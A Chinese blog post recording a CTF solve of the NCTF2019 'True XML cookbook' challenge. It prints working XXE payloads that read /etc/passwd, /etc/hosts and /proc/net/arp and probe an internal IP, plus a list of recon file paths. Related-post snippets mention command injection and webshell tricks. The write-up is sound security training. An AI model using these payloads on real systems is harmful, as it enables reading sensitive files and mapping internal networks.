CTF第十三天

最新推荐文章于 2022-07-01 15:14:41 发布
最新推荐文章于 2022-07-01 15:14:41 发布
阅读量144 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52680097/article/details/117666356
版权

[NCTF2019]True XML cookbook

前几天学了XXE注入,今天试试
进去后是一个登录界面,随便登一下抓包,发现POST那熟悉的XML的格式
在这里插入图片描述
拿之前练习的Payload来试试

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
<username>&xxe;</username>
<password>123456</password>
</user>

在这里插入图片描述
但是之后这些路径好像都打不开
我们试试利用xxe攻击内网
再读取主机

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]>
<user>
<username>&xxe;</username>
<password>123456</password>
</user>

返回了一些页面,我们可以在上面看看有哪些存活的主机,但是好像没有
在这里插入图片描述
真的没有吗?还是这个不行?我又换了一个试试,结果这一次看到了一台主机

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///proc/net/arp"> ]>
<user>
<username>&xxe;</username>
<password>foo</password>
</user>


我们试着访问一下

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://10.0.233.2"> ]>
<user>
<username>&xxe;</username>
<password>foo</password>
</user>

结果不存在
在这里插入图片描述
但是IP的基本格式我们已经知道了,我们试着爆破最后几位
在这里插入图片描述
找到flag
在这里插入图片描述
知识点:
xxe可以攻击内网,以下是一些攻击内网的payload,先存着,以后用得上再说

/etc/hosts
/proc/net/arp
/proc/net/tcp
/proc/net/udp
/proc/net/dev
/proc/net/fib_trie
、Ange射手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
buuctf刷题记录
Realiy的博客
08-06 837
8月6日buuctf [MRCTF2020]Ez_bypass 知识点MD5绕过,php特性 打开得到源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (m
CTF打卡第一天
weixin_60499871的博客
07-04 537
攻防世界网站:https://adworld.xctf.org.cn/ 新手区第一题:this_is_flag 第二题:pdf下载完文档, 使用PDF转换器为word,打开如下图在图下面有flag 第三题:如来十三掌 打开附件如图 使用佛日解密:得到的:MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAenJchMUAeqzWenzEmLJW9,再使用 rot13解密:用Python脚本 运行得到:ZmxhZ3tiZHNjamhia3ptbmZyZGhidmNraWpuZHNrdmJramRzY
CTF常用知识点整理(个人刷题中整理)
Hopeace的博客
07-19 4216
由于是之前刷题的整理,参照了很多大神的博客,由于过于零碎,没能记录下各位大神的文章出处(以后会提高版权意识的),如有侵权,私聊补加出处或者删文章。 博主是入门半年的萌新,文章不可避免会有很多错误,还请大家指正。 ### **PHP** var_dump( ) 以列的形式展开数据,方便查看 scandir( ) 扫描某一文件夹目录 file_get_contents( ) 读取文件,拼接用'.' 如num=file_get_contents(chr(47...
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 5万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 437
xPATH
ROT13加密和解密
neal1991的专栏
04-11 1万+
问题ROT13(回转13位)是一种简易的替换式密码算法。它是一种在英文网络论坛用作隐藏八卦、妙句、谜题解答以及某些脏话的工具,目的是逃过版主或管理员的匆匆一瞥。ROT13 也是过去在古罗马开发的凯撒密码的一种变体。ROT13是它自身的逆反,即:要还原成原文只要使用同一算法即可得,故同样的操作可用于加密与解密。该算法并没有提供真正密码学上的保全,故它不应该被用于需要保全的用途上。它常常被当作弱加密示例
CTF第十四天
qq_52680097的博客
08-28 900
CTF第十四天 太久没写了,今天挑战下题目 LD_PRELOAD 太久没整了,我都忘了PHP是啥,再复习一遍。 PHP是一种能在服务器端执行的脚本语言,也可嵌入到HTML中 看到这个提示,先来了解下Linux LD_PRELOAD环境变量 这里有关于动态链接库的详解和Linux LD_PRELOAD环境变量简介 动态链接库详解【一】 linux 环境变量LD_PRELOAD简介 定义优先加载的动态链接库 了解了这些,大概就能知道这题的原理了 原理:php部分函数在执行的时候会加载动态库里面的函数,而LD_
一天一道CTF 第13天(双写绕过SQL注入 dirsearch)
scrawman的博客
03-22 526
今天做两道因为明天有个大工程 [极客大挑战 2019]Upload 背景选的不错 就是简单的一句话木马然后抓包改后缀名再webshell连接,做过太多遍了这里就不做了,直接下一道 [极客大挑战 2019]BabySQL 尝试admin' or '1'='1和password'发现password里的or被删掉了,这里应该是用最简单粗暴的删除字符串来过滤。多试几次就会发现还过滤了union和select,这种过滤双写绕过即可,payload基本都和上次一样。 http://74522396-5ad3-4
CTF第十天
qq_52680097的博客
06-03 177
MD5 1 下载文件得到密文e00cf25ad42683b3df678c61f42c6bda 拿去md5解密,写成flag{admin1}即可 Url编码 1 下载密文,放在burp中url解码就行 一眼就解密 看到密文最后有个等号,猜想是base64解码,试试看 看我回旋踢 密文synt{5pq1004q-86n5-46q8-o720-oro5on0417r1} 猜出前面那个肯定是flag这个单词,列个字母表数数看,发现果然都偏移了13位,是凯撒加密 摩丝 文件里有一段摩斯密码,解密 解密网站
CTF Web各种题目的解题姿势
07-27
课时6:CTF SQL基于约束注入原理与利用12'22 课时7:SQL注入基于时间注入的原理与利用50'13 课时8:SQL基于时间盲注的Python自动化解题22'45 课时9:Sqlmap自动化注入工具介绍23'47 课时10:Sqlmap自动化注入...
CTF - 第二届“陇剑杯”网络安全大赛线上赛部分write up
最新发布
08-26
在第十一到十三个题目中,ez_web_1、ez_web_2 和 ez_web_3 的操作内容分别是什么?答案是观察流量发现可疑文件 ViewMore.php, 将加密后的 admIn 放在 wireshark 中搜索,和在 charles 中打开下载的文件,并且按照...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
2020第十三届全国大学生信息安全竞赛大部分题目
08-22
除了pwn类题和web的easy_unserialize全都有
CTF-简单的加密解密
qq_52680097的博客
05-17 1万+
CTF-简单的加密解密 最近遇上了一到ctf的比赛题,所以记录下来。 1.下载附件 2.打开后发现是验证flag值的一个程序,猜想要用反编译的软件,Easy Python Decompiler获取源码 3.分析代码 # Embedded file name: 2.py import base64 def encode(yourflag): #对输入的flag进行加密 s = '' #将输入的flag拆成单个的字符 fo
CTF第三天
qq_52680097的博客
05-26 464
[极客大挑战 2019]Knife 1 进去以后,看到这个页面,猜想要用蚁剑 例 //eval — 把字符串bai作为PHP代码执行 eval('echo 123;');//输出123 eval($_POST["Syc"]);//上传一个字符串Sys 打开蚁剑,添加URL,密码为Sys 连接后在根目录找到flag [GXYCT [GXYCTF2019]Ping Ping Ping 1 进去后看到这个一个查询ip的格式,我们可以用这个来输入命令 首先输入/?ip=127.0.0.1|ls,发现了
CTF第十五天
qq_52680097的博客
08-29 433
JSON Web Token 关于JWT,下面是一些资料 添加链接描述 添加链接描述 简单来说,就是身份验证的payload 敏感信息泄露 1.随便登录一个账号后再网页工具的“网络”查看token 2.解密 添加链接描述 3.将上面和下面拼成flag值就行 无签名 1.在pycharm中加入pyjwt库,下面是安装教程 添加链接描述 2.运行以下脚本 import jwt payload={ "username": "admin", "password": "admin", "role":
CTF第八天
qq_52680097的博客
06-01 381
[BSidesCF 2020]Had a bad day 1 可能存在SQL注入或者文件包含,试试用filter伪协议读取index.php文件 /index.php?category=php://filter/read=convert.base64-encode/resource=index.php 报错了 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败,结果把.php后缀去掉,可以读取 /index.php?category=php://filter/read=c
CTF密码学基础与编码解析
CTF中,Unicode常以\u转义序列的形式出现,例如将文本"You had me at hello"编码为"\u0059\u006f\u0075\u0020\u0068\u0065\u006c\u006c\u006f"。解码这类题目需要理解Unicode编码规则,并能将其转换回原始文本。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值